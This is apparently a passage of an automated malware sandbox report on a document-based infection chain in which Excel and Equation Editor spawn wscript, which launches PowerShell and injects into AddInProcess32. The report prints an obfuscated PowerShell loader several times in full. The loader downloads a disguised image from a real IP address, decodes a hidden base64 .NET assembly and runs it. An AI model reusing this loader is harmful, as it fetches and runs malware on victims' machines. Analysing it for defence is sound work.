by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)| iex"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)| iex"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)| iex"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)| iex"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_002D64B7 pushfd ; iretd 6_2_002D64C1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_002D257D push ebx; retf 6_2_002D25EA
                  Source: 6.2.powershell.exe.61e08f4.3.raw.unpack, Home.csHigh entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
                  Source: 6.2.powershell.exe.61e08f4.3.raw.unpack, RunPEE.csHigh entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
                  Source: 6.2.powershell.exe.61e08f4.3.raw.unpack, Class2.csHigh entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'
                  Source: 6.2.powershell.exe.65cd9c4.2.raw.unpack, Home.csHigh entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
                  Source: 6.2.powershell.exe.65cd9c4.2.raw.unpack, RunPEE.csHigh entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
                  Source: 6.2.powershell.exe.65cd9c4.2.raw.unpack, Class2.csHigh entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'
                  Source: 6.2.powershell.exe.2b0000.0.raw.unpack, Home.csHigh entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
                  Source: 6.2.powershell.exe.2b0000.0.raw.unpack, RunPEE.csHigh entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
                  Source: 6.2.powershell.exe.2b0000.0.raw.unpack, Class2.csHigh entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036205E6 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_036205E6
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
